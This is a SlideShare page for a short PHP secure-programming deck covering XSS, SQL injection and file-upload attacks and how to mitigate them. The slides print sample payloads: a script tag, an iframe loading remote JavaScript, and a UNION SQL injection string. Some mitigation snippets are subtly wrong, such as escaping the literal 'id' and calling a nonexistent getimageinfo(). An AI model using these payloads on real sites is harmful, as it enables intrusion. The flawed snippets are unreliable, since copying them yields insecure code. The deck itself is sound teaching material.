SlideShare a Scribd company logo

Secure Programming In Php

Akash Mahajan
Akash Mahajan

This document provides an overview of common web application vulnerabilities in PHP like cross-site scripting (XSS), SQL injection, and file uploads, along with mitigation strategies. It discusses XSS attacks like persistent, reflected, and DOM-based XSS. It recommends sanitizing inputs, output encoding, and using libraries like inspekt to prevent XSS. For SQL injection, it suggests using parameterized queries, stored procedures, and escaping special characters. For file uploads, it advises validating file types, randomizing filenames, and restricting permissions. The document aims to help secure PHP web applications from these attacks.

Technology
1 of 8
1
2
3
4
5
6
7
8
Secure Web App Programming in PHPAkash Mahajan v1.0
Cross Site Scripting - XSSInjecting HTML/JS into the site. Non-persistent/Reflected/First OrderScript is taken from the request and displayed in the browser directlyexample.com/search?q=<script>alert(‘hi’);</script>Example.com/index.php?lang=path to php shell Persistent/Stored/Second OrderFirst name of a registration form is vuln and the value is stored in the databaseHello <iframesrc=http://f1y.in/0.js></iframe>DOM BasedNo example, mentioned by AmitKlien in his paper XSS of the Third Kind
XSS mitigation in PHPSanitize all globals ($_GET, $_POST, $_COOKIE)Use strip_tags()Use inpekt library code.google.com/p/inspektEscape everything before displayinghtmlentities(), htmlspeciachars()Client headers like user agent can be malicious as well. Thumb rule, if its not your data consider it bad. If you can verify it, consider it trusted good data.White listing helps in verifying good data more than black listing.See examples at xssed.com
SQL Injection Allowing SQL to be injected in the database query. Most common attack point is the search of any dynamic website and registration forms. These two will be definitely talking to the database. $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";id = ‘ OR 1 UNION ALL SELECT * FROM table;Excellent examples http://google.com/search?q=site:slideshare.net sql injection
SQL Injection - Mitigationmysql_real_escape_string()$dbquery = sprintf(“SELECT name FROM user WHERE id=‘%s’”, mysql_real_escape_string(‘id’));Parameterized queries$res = $query(“SELECT name FROM user WHERE id=?”, $id);Standard mysql module in PHP doesn’t allow for parameterized queries. You need mysqli Stored ProceduresSee a kickass example of stored proc used to hack more than hundred thousand websiteshttp://www.breach.com/resources/breach-security-labs/alerts/mass-sql-injection-attack-evolutio
File UploadsWeb apps add a directory in document root for storing file uploads and give write access. They don’t randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. The malicious user is now free to call it using a GET request and it gets executed. http://www.scanit.be/uploads/php-file-upload.pdf
File Uploads - MitigationThe usual use case is uploading of image files. Use getimageinfo() to get the correct mime type of the file from the file header.Generate a random file name $rand = time() . substr(md5(microtime()), 0, rand(5, 12));Return $rand and append file extensionIdeally noexec permission should be set on the directory where files are copied to.
EndgameAt this point you have reasonable ensured that your PHP web application is not compromised. But the user connecting to your website are vulnerable to session hijacking, CSRF from your site etc.There are work around to the standard PHP functions like this one for mysql_real_escape_strings()http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

More Related Content

What's hot (20)

PPT
Intro to Web Application Security
Rob Ragan
 
PPT
На страже ваших денег и данных
Positive Hack Days
 
PDF
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
PPT
[Php Camp]Owasp Php Top5+Csrf
Bipin Upadhyay
 
PPT
How To Detect Xss
Ferruh Mavituna
 
PPTX
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
PDF
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
 
PPT
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
PDF
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
PPTX
Cyber ppt
karthik menon
 
PDF
HackFest 2015 - Rasp vs waf
IMMUNIO
 
PPTX
Security Code Review 101
Paul Ionescu
 
PDF
How to secure web applications
Mohammed A. Imran
 
PPTX
Web application attacks
hruth
 
PDF
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
PPTX
Web application security
Kapil Sharma
 
PPTX
Abusing Exploiting and Pwning with Firefox Addons
Ajin Abraham
 
PDF
Shellcoding in linux
Ajin Abraham
 
PDF
Owasp top 10_openwest_2019
Sean Jackson
 
PPTX
Securing the Web @DevDay Da Nang 2018
Sumanth Damarla
 
Intro to Web Application Security
Rob Ragan
 
На страже ваших денег и данных
Positive Hack Days
 
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
[Php Camp]Owasp Php Top5+Csrf
Bipin Upadhyay
 
How To Detect Xss
Ferruh Mavituna
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
Cyber ppt
karthik menon
 
HackFest 2015 - Rasp vs waf
IMMUNIO
 
Security Code Review 101
Paul Ionescu
 
How to secure web applications
Mohammed A. Imran
 
Web application attacks
hruth
 
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
Web application security
Kapil Sharma
 
Abusing Exploiting and Pwning with Firefox Addons
Ajin Abraham
 
Shellcoding in linux
Ajin Abraham
 
Owasp top 10_openwest_2019
Sean Jackson
 
Securing the Web @DevDay Da Nang 2018
Sumanth Damarla
 

Similar to Secure Programming In Php (20)

PDF
null Bangalore meet - Php Security
n|u - The Open Security Community
 
PPT
PHPUG Presentation
Damon Cortesi
 
PPT
Php My Sql Security 2007
Aung Khant
 
PPT
Security.ppt
webhostingguy
 
PPT
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
PPT
Php & Web Security - PHPXperts 2009
mirahman
 
PDF
Security Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp
 
PDF
Security Bootcamp 2013 lap trinh web an toan
Security Bootcamp
 
PPT
Php Security By Mugdha And Anish
OSSCube
 
PPTX
Owasp Top 10 A1: Injection
Michael Hendrickx
 
ODP
Security In PHP Applications
Aditya Mooley
 
PPS
Hacking - Web based attacks
VNIT-ACM Student Chapter
 
ODP
Database security for PHP
Rohan Faye
 
PDF
Hacking sites for fun and profit
David Stockton
 
PDF
PHP Secure Programming
Balavignesh Kasinathan
 
PDF
Intro to Php Security
Dave Ross
 
PDF
Web Application Security
Richard Peter Ong
 
PDF
Evolution Of Web Security
Chris Shiflett
 
ODP
Jeff Channell - Secure PHP Coding Practices
vdrover
 
PPTX
Open source security
lrigknat
 
null Bangalore meet - Php Security
n|u - The Open Security Community
 
PHPUG Presentation
Damon Cortesi
 
Php My Sql Security 2007
Aung Khant
 
Security.ppt
webhostingguy
 
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Php & Web Security - PHPXperts 2009
mirahman
 
Security Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp
 
Security Bootcamp 2013 lap trinh web an toan
Security Bootcamp
 
Php Security By Mugdha And Anish
OSSCube
 
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Security In PHP Applications
Aditya Mooley
 
Hacking - Web based attacks
VNIT-ACM Student Chapter
 
Database security for PHP
Rohan Faye
 
Hacking sites for fun and profit
David Stockton
 
PHP Secure Programming
Balavignesh Kasinathan
 
Intro to Php Security
Dave Ross
 
Web Application Security
Richard Peter Ong
 
Evolution Of Web Security
Chris Shiflett
 
Jeff Channell - Secure PHP Coding Practices
vdrover
 
Open source security
lrigknat
 
Ad

More from Akash Mahajan (17)

PDF
On Writing Well - A talk given at WinjaBlogs Session
Akash Mahajan
 
PDF
App sec in the time of docker containers
Akash Mahajan
 
PPTX
Venom vulnerability Overview and a basic demo
Akash Mahajan
 
PPTX
Security in the cloud Workshop HSTC 2014
Akash Mahajan
 
ODP
INCOMPLETE - OUTLINE for RootConf 2014 - The little-servcie-which-wasn't-there
Akash Mahajan
 
PPTX
The real incident of stealing a droid app+data
Akash Mahajan
 
PPTX
Believe It Or Not SSL Attacks
Akash Mahajan
 
PPTX
I haz your mouse clicks and key strokes
Akash Mahajan
 
PPTX
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
PPTX
Secure HTTP Headers c0c0n 2011 Akash Mahajan
Akash Mahajan
 
PPTX
Php security
Akash Mahajan
 
PPTX
Secure passwords-theory-and-practice
Akash Mahajan
 
PDF
Top 10 web application security risks akash mahajan
Akash Mahajan
 
PDF
Web application security
Akash Mahajan
 
PPTX
Web application security
Akash Mahajan
 
PPTX
Web application security
Akash Mahajan
 
PPT
Startups Security
Akash Mahajan
 
On Writing Well - A talk given at WinjaBlogs Session
Akash Mahajan
 
App sec in the time of docker containers
Akash Mahajan
 
Venom vulnerability Overview and a basic demo
Akash Mahajan
 
Security in the cloud Workshop HSTC 2014
Akash Mahajan
 
INCOMPLETE - OUTLINE for RootConf 2014 - The little-servcie-which-wasn't-there
Akash Mahajan
 
The real incident of stealing a droid app+data
Akash Mahajan
 
Believe It Or Not SSL Attacks
Akash Mahajan
 
I haz your mouse clicks and key strokes
Akash Mahajan
 
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Secure HTTP Headers c0c0n 2011 Akash Mahajan
Akash Mahajan
 
Php security
Akash Mahajan
 
Secure passwords-theory-and-practice
Akash Mahajan
 
Top 10 web application security risks akash mahajan
Akash Mahajan
 
Web application security
Akash Mahajan
 
Web application security
Akash Mahajan
 
Web application security
Akash Mahajan
 
Startups Security
Akash Mahajan
 
Ad

Recently uploaded (20)

PDF
Database Benchmarking for Performance Masterclass: Session 2 - Data Modeling ...
ScyllaDB
 
PDF
FME as an Orchestration Tool with Principles From Data Gravity
Safe Software
 
PPTX
reInforce 2025 Lightning Talk - Scott Francis.pptx
ScottFrancis51
 
PPTX
01_Approach Cyber- DORA Incident Management.pptx
FinTech Belgium
 
PDF
My Journey from CAD to BIM: A True Underdog Story
Safe Software
 
PPTX
CapCut Pro Crack For PC Latest Version {Fully Unlocked} 2025
pcprocore
 
PDF
Why aren't you using FME Flow's CPU Time?
Safe Software
 
PDF
Redefining Work in the Age of AI - What to expect? How to prepare? Why it mat...
Malinda Kapuruge
 
PDF
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Priyanka Aash
 
PDF
How to Visualize the ​Spatio-Temporal Data Using CesiumJS​
SANGHEE SHIN
 
PDF
Kubernetes - Architecture & Components.pdf
geethak285
 
PDF
Java 25 and Beyond - A Roadmap of Innovations
Ana-Maria Mihalceanu
 
PDF
5 Things to Consider When Deploying AI in Your Enterprise
Safe Software
 
PDF
Database Benchmarking for Performance Masterclass: Session 1 - Benchmarking F...
ScyllaDB
 
PDF
Hyderabad MuleSoft In-Person Meetup (June 21, 2025) Slides
Ravi Tamada
 
PDF
The Growing Value and Application of FME & GenAI
Safe Software
 
PPTX
MARTSIA: A Tool for Confidential Data Exchange via Public Blockchain - Pitch ...
Michele Kryston
 
PDF
Quantum AI Discoveries: Fractal Patterns Consciousness and Cyclical Universes
Saikat Basu
 
PDF
Automating the Geo-Referencing of Historic Aerial Photography in Flanders
Safe Software
 
PDF
2025_06_18 - OpenMetadata Community Meeting.pdf
OpenMetadata
 
Database Benchmarking for Performance Masterclass: Session 2 - Data Modeling ...
ScyllaDB
 
FME as an Orchestration Tool with Principles From Data Gravity
Safe Software
 
reInforce 2025 Lightning Talk - Scott Francis.pptx
ScottFrancis51
 
01_Approach Cyber- DORA Incident Management.pptx
FinTech Belgium
 
My Journey from CAD to BIM: A True Underdog Story
Safe Software
 
CapCut Pro Crack For PC Latest Version {Fully Unlocked} 2025
pcprocore
 
Why aren't you using FME Flow's CPU Time?
Safe Software
 
Redefining Work in the Age of AI - What to expect? How to prepare? Why it mat...
Malinda Kapuruge
 
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Priyanka Aash
 
How to Visualize the ​Spatio-Temporal Data Using CesiumJS​
SANGHEE SHIN
 
Kubernetes - Architecture & Components.pdf
geethak285
 
Java 25 and Beyond - A Roadmap of Innovations
Ana-Maria Mihalceanu
 
5 Things to Consider When Deploying AI in Your Enterprise
Safe Software
 
Database Benchmarking for Performance Masterclass: Session 1 - Benchmarking F...
ScyllaDB
 
Hyderabad MuleSoft In-Person Meetup (June 21, 2025) Slides
Ravi Tamada
 
The Growing Value and Application of FME & GenAI
Safe Software
 
MARTSIA: A Tool for Confidential Data Exchange via Public Blockchain - Pitch ...
Michele Kryston
 
Quantum AI Discoveries: Fractal Patterns Consciousness and Cyclical Universes
Saikat Basu
 
Automating the Geo-Referencing of Historic Aerial Photography in Flanders
Safe Software
 
2025_06_18 - OpenMetadata Community Meeting.pdf
OpenMetadata
 

Secure Programming In Php

  • 1. Secure Web App Programming in PHPAkash Mahajan v1.0
  • 2. Cross Site Scripting - XSSInjecting HTML/JS into the site. Non-persistent/Reflected/First OrderScript is taken from the request and displayed in the browser directlyexample.com/search?q=<script>alert(‘hi’);</script>Example.com/index.php?lang=path to php shell Persistent/Stored/Second OrderFirst name of a registration form is vuln and the value is stored in the databaseHello <iframesrc=http://f1y.in/0.js></iframe>DOM BasedNo example, mentioned by AmitKlien in his paper XSS of the Third Kind
  • 3. XSS mitigation in PHPSanitize all globals ($_GET, $_POST, $_COOKIE)Use strip_tags()Use inpekt library code.google.com/p/inspektEscape everything before displayinghtmlentities(), htmlspeciachars()Client headers like user agent can be malicious as well. Thumb rule, if its not your data consider it bad. If you can verify it, consider it trusted good data.White listing helps in verifying good data more than black listing.See examples at xssed.com
  • 4. SQL Injection Allowing SQL to be injected in the database query. Most common attack point is the search of any dynamic website and registration forms. These two will be definitely talking to the database. $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";id = ‘ OR 1 UNION ALL SELECT * FROM table;Excellent examples http://google.com/search?q=site:slideshare.net sql injection
  • 5. SQL Injection - Mitigationmysql_real_escape_string()$dbquery = sprintf(“SELECT name FROM user WHERE id=‘%s’”, mysql_real_escape_string(‘id’));Parameterized queries$res = $query(“SELECT name FROM user WHERE id=?”, $id);Standard mysql module in PHP doesn’t allow for parameterized queries. You need mysqli Stored ProceduresSee a kickass example of stored proc used to hack more than hundred thousand websiteshttp://www.breach.com/resources/breach-security-labs/alerts/mass-sql-injection-attack-evolutio
  • 6. File UploadsWeb apps add a directory in document root for storing file uploads and give write access. They don’t randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. The malicious user is now free to call it using a GET request and it gets executed. http://www.scanit.be/uploads/php-file-upload.pdf
  • 7. File Uploads - MitigationThe usual use case is uploading of image files. Use getimageinfo() to get the correct mime type of the file from the file header.Generate a random file name $rand = time() . substr(md5(microtime()), 0, rand(5, 12));Return $rand and append file extensionIdeally noexec permission should be set on the directory where files are copied to.
  • 8. EndgameAt this point you have reasonable ensured that your PHP web application is not compromised. But the user connecting to your website are vulnerable to session hijacking, CSRF from your site etc.There are work around to the standard PHP functions like this one for mysql_real_escape_strings()http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string